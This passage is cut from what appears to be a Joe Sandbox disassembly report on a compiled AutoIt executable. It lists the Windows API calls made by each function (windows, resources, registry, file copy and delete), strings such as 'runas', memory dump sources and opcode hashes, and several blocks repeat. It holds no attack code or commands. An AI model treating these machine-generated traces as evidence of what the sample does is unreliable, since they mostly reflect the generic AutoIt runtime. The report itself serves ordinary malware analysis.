                                                                                                                  • Part of subcall function 008E3A46: LoadIconW.USER32(000000A2), ref: 008E3A9A
                                                                                                                  • Part of subcall function 008E3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E3AC0
                                                                                                                  • Part of subcall function 008E3A46: RegisterClassExW.USER32(?), ref: 008E3B16
                                                                                                                  • Part of subcall function 008E39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E3A03
                                                                                                                  • Part of subcall function 008E39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3A24
                                                                                                                  • Part of subcall function 008E39D5: ShowWindow.USER32(00000000,?,?), ref: 008E3A38
                                                                                                                  • Part of subcall function 008E39D5: ShowWindow.USER32(00000000,?,?), ref: 008E3A41
                                                                                                                  • Part of subcall function 008E434A: _memset.LIBCMT ref: 008E4370
                                                                                                                  • Part of subcall function 008E434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E4415
                                                                                                                Strings
                                                                                                                • runas, xrefs: 0091D33A
                                                                                                                • This is a third-party compiled AutoIt script., xrefs: 0091D279
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                • API String ID: 529118366-3287110873
                                                                                                                • Opcode ID: 5fd5f6db0a0d09efb2765a5ea3388a04b412fc8f0f4e925a6a3ea0d89579d426
                                                                                                                • Instruction ID: b835cbf61447af353a8b883372ecb3cd477d37cd7d11316db12f233def44adda
                                                                                                                • Opcode Fuzzy Hash: 5fd5f6db0a0d09efb2765a5ea3388a04b412fc8f0f4e925a6a3ea0d89579d426
                                                                                                                • Instruction Fuzzy Hash: 5D51D731A0C288AECF11ABB9DC15EED7B78FF47744B104065F931E3162DA708A45DB62

                                                                                                                Control-flow Graph
                                                                                                                • Graph figure: entry block 8e49a0-8e4a00; blocks call 8e7667, GetVersionExW, 8e7bcc, 8e7d2c, 8e7726, GetCurrentProcess, IsWow64Process, 8e4b37, GetNativeSystemInfo, FreeLibrary and GetSystemInfo (full edge list of the rendered graph not recoverable)
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 008E49CD
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                • GetCurrentProcess.KERNEL32(?,0096FAEC,00000000,00000000,?), ref: 008E4A9A
                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 008E4AA1
                                                                                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008E4AE7
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 008E4AF2
                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 008E4B23
                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 008E4B2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1986165174-0
                                                                                                                • Opcode ID: 61c589508dfc2057e4b6ce2f23accea6fa7ce123588c1c0d7d72874dd1770c6b
                                                                                                                • Instruction ID: b1b021acc82c1f4e7250c818f3376f3fe7182fa8a23d3352d54988639c9d37af
                                                                                                                • Opcode Fuzzy Hash: 61c589508dfc2057e4b6ce2f23accea6fa7ce123588c1c0d7d72874dd1770c6b
                                                                                                                • Instruction Fuzzy Hash: E391D33198E7C4DEC731DB6994501AAFFF5BF2B310B4849AED0CB93A41D220A548D76A

                                                                                                                Control-flow Graph
                                                                                                                • Graph figure: entry block 8e4e89-8e4ea1; blocks call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource (full edge list of the rendered graph not recoverable)
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008E4D8E,?,?,00000000,00000000), ref: 008E4E99
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E4D8E,?,?,00000000,00000000), ref: 008E4EB0
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,008E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008E4E2F), ref: 0091D937
                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,008E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008E4E2F), ref: 0091D94C
                                                                                                                • LockResource.KERNEL32(008E4D8E,?,?,008E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008E4E2F,00000000), ref: 0091D95F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: f510b28a10ac1527c581fe1f36be4d0e177a9ceb7ad2c131c4f31f9b45ca4443
                                                                                                                • Instruction ID: 2ebc5f2a7fd53fcd9d253f87dba3da5c1b50be3feadae412c4937354ebbf60be
                                                                                                                • Opcode Fuzzy Hash: f510b28a10ac1527c581fe1f36be4d0e177a9ceb7ad2c131c4f31f9b45ca4443
                                                                                                                • Instruction Fuzzy Hash: E0115E75244741BFD7218B66EC58F677BBAFBC5B21F10426CF41AC6250DBA1E8009A60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 3964851224-0
                                                                                                                • Opcode ID: 6ef5660142bcf057e64df4a812ae882547a54f1318116fb071f918c3fcb033da
                                                                                                                • Instruction ID: 87e7a23a722d7587a7ccc2365c6c9c28d32c029e7ec4a7ad8d10dad752eddafe
                                                                                                                • Opcode Fuzzy Hash: 6ef5660142bcf057e64df4a812ae882547a54f1318116fb071f918c3fcb033da
                                                                                                                • Instruction Fuzzy Hash: AC9254706083558FD720DF28C480B2ABBE5FF89304F14896DE99A9B262D775EC45CF92
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,0091E398), ref: 0094446A
                                                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0094447B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094448B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 48322524-0
                                                                                                                • Opcode ID: 83eea3cdc0f222b71453881d0c7ba634343a367e035060e33806350637d09bc7
                                                                                                                • Instruction ID: 847ac4dfcd3b1c0369854eda4cb1617017ba16acb78f9437a8ef5e7d24b22fb7
                                                                                                                • Opcode Fuzzy Hash: 83eea3cdc0f222b71453881d0c7ba634343a367e035060e33806350637d09bc7
                                                                                                                • Instruction Fuzzy Hash: 65E0D8374245006746106B38FC1DDE97B9C9E05375F10071AF835C11E0F7B45900A996
                                                                                                                Strings
                                                                                                                • Variable must be of type 'Object'., xrefs: 00923E62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Variable must be of type 'Object'.
                                                                                                                • API String ID: 0-109567571
                                                                                                                • Opcode ID: 3bacdce0d6a36acac8ac2dafe629715d5349492eacd3fac5355315bd26fcbfd8
                                                                                                                • Instruction ID: 90edc2e10727bf4fc2f23e1795ff31653503a7b3eaec5692fd81dc83a5699c9c
                                                                                                                • Opcode Fuzzy Hash: 3bacdce0d6a36acac8ac2dafe629715d5349492eacd3fac5355315bd26fcbfd8
                                                                                                                • Instruction Fuzzy Hash: 69A2BD74A00259CFCB24CF5AC880AAEB7B1FF5A314F248469E915EB356D734ED42CB90
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F0A5B
                                                                                                                • timeGetTime.WINMM ref: 008F0D16
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F0E53
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 008F0E61
                                                                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 008F0EFA
                                                                                                                • DestroyWindow.USER32 ref: 008F0F06
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008F0F20
                                                                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00924E83
                                                                                                                • TranslateMessage.USER32(?), ref: 00925C60
                                                                                                                • DispatchMessageW.USER32(?), ref: 00925C6E
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00925C82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                • API String ID: 4212290369-3242690629
                                                                                                                • Opcode ID: 721449eba2ec57a37a5f3ecd7944362544535c4fcd26cb51f55963a315d7b2f9
                                                                                                                • Instruction ID: 5e0547e94c4cc21410f259632cd6996cdc3369cd6e7458e646618bf3843811d1
                                                                                                                • Opcode Fuzzy Hash: 721449eba2ec57a37a5f3ecd7944362544535c4fcd26cb51f55963a315d7b2f9
                                                                                                                • Instruction Fuzzy Hash: 5CB2DD70608755DFD728DF24D884BAAB7E4FF85304F15891DE59AD72A2CB70E884CB82

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00948F5F: __time64.LIBCMT ref: 00948F69
                                                                                                                  • Part of subcall function 008E4EE5: _fseek.LIBCMT ref: 008E4EFD
                                                                                                                • __wsplitpath.LIBCMT ref: 00949234
                                                                                                                  • Part of subcall function 009040FB: __wsplitpath_helper.LIBCMT ref: 0090413B
                                                                                                                • _wcscpy.LIBCMT ref: 00949247
                                                                                                                • _wcscat.LIBCMT ref: 0094925A
                                                                                                                • __wsplitpath.LIBCMT ref: 0094927F
                                                                                                                • _wcscat.LIBCMT ref: 00949295
                                                                                                                • _wcscat.LIBCMT ref: 009492A8
                                                                                                                  • Part of subcall function 00948FA5: _memmove.LIBCMT ref: 00948FDE
                                                                                                                  • Part of subcall function 00948FA5: _memmove.LIBCMT ref: 00948FED
                                                                                                                • _wcscmp.LIBCMT ref: 009491EF
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949824
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949837
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00949452
                                                                                                                • _wcsncpy.LIBCMT ref: 009494C5
                                                                                                                • DeleteFileW.KERNEL32(?,?), ref: 009494FB
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00949511
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00949522
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00949534
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1500180987-0
                                                                                                                • Opcode ID: 4b28bf5edc2b5765b797042fbb11c1c28b987232d81703499743a869715caa76
                                                                                                                • Instruction ID: db77ed747cf206c226755ab68baf1305668ca6a61b9d3be4f10fa39232bb76f1
                                                                                                                • Opcode Fuzzy Hash: 4b28bf5edc2b5765b797042fbb11c1c28b987232d81703499743a869715caa76
                                                                                                                • Instruction Fuzzy Hash: 6BC128B1900219AEDF21DFA5CC95EDFB7BDEF85310F0040AAF609E6191EB709A448F65

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008E3074
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 008E309E
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E30AF
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 008E30CC
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E30DC
                                                                                                                • LoadIconW.USER32(000000A9), ref: 008E30F2
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E3101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 3de76f4b78a125e4eddd1e8be2734e4333c89a553c4dfdb6232cb235b896ef20
                                                                                                                • Instruction ID: 6b5a883b4f1e0621f97d30caf54a2858e7e633492bc17ad2bc9e25f1103f532e
                                                                                                                • Opcode Fuzzy Hash: 3de76f4b78a125e4eddd1e8be2734e4333c89a553c4dfdb6232cb235b896ef20
                                                                                                                • Instruction Fuzzy Hash: C83127B1959349AFDB10CFA4E889A8DBBF0FF09310F14452EE590E62A1D3B90585DF91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008E3074
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 008E309E
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E30AF
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 008E30CC
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E30DC
                                                                                                                • LoadIconW.USER32(000000A9), ref: 008E30F2
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E3101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 96fac43c6466486316f606788d955ec984e182d7dfd9d045e66413a43caa748a
                                                                                                                • Instruction ID: 6aea2f5c004cdadb2a1f1dc0932aac86beaea9b3a9e2e067a3e2a74e3cf212bf
                                                                                                                • Opcode Fuzzy Hash: 96fac43c6466486316f606788d955ec984e182d7dfd9d045e66413a43caa748a
                                                                                                                • Instruction Fuzzy Hash: E521C7B1A29218AFDF00DFA8EC49B9DBBF4FB09700F01412AF910A62A0D7B54544AF91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009A52F8,?,008E37AE,?), ref: 008E4724
                                                                                                                  • Part of subcall function 0090050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008E7165), ref: 0090052D
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008E71A8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0091E8C8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0091E909
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0091E947
                                                                                                                • _wcscat.LIBCMT ref: 0091E9A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                • API String ID: 2673923337-2727554177
                                                                                                                • Opcode ID: cfc96508f73a7570e8be307aab5b918116f97dd21f401f9e956bf320d993423b
                                                                                                                • Instruction ID: a8a2b1392e19047047fb1d99faec8a9074f7853e7044a22854e6e1ff446d0d51
                                                                                                                • Opcode Fuzzy Hash: cfc96508f73a7570e8be307aab5b918116f97dd21f401f9e956bf320d993423b
                                                                                                                • Instruction Fuzzy Hash: 15718E7151C3019EC304EF69EC41AABBBE8FF96350F44092EF865C71A1DB709948DB92

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008E3A50
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 008E3A5F
                                                                                                                • LoadIconW.USER32(00000063), ref: 008E3A76
                                                                                                                • LoadIconW.USER32(000000A4), ref: 008E3A88
                                                                                                                • LoadIconW.USER32(000000A2), ref: 008E3A9A
                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E3AC0
                                                                                                                • RegisterClassExW.USER32(?), ref: 008E3B16
                                                                                                                  • Part of subcall function 008E3041: GetSysColorBrush.USER32(0000000F), ref: 008E3074
                                                                                                                  • Part of subcall function 008E3041: RegisterClassExW.USER32(00000030), ref: 008E309E
                                                                                                                  • Part of subcall function 008E3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E30AF
                                                                                                                  • Part of subcall function 008E3041: InitCommonControlsEx.COMCTL32(?), ref: 008E30CC
                                                                                                                  • Part of subcall function 008E3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E30DC
                                                                                                                  • Part of subcall function 008E3041: LoadIconW.USER32(000000A9), ref: 008E30F2
                                                                                                                  • Part of subcall function 008E3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E3101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: 6feeb5f28c642d3d234d29ae19f4f496448e35a6f2221e7332b1f50856479133
                                                                                                                • Instruction ID: 1c2125c5f7c43b2c7665859c9983f089c96006bcbe7e202f3db2345b5e0b4c75
                                                                                                                • Opcode Fuzzy Hash: 6feeb5f28c642d3d234d29ae19f4f496448e35a6f2221e7332b1f50856479133
                                                                                                                • Instruction Fuzzy Hash: C3214B71E29708AFEB10DFA4EC09B9D7BB4FB09711F11012AE914A72B1D3B55A40AFC4

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 008E36D2
                                                                                                                • KillTimer.USER32(?,00000001), ref: 008E36FC
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E371F
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E372A
                                                                                                                • CreatePopupMenu.USER32 ref: 008E373E
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 008E374D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
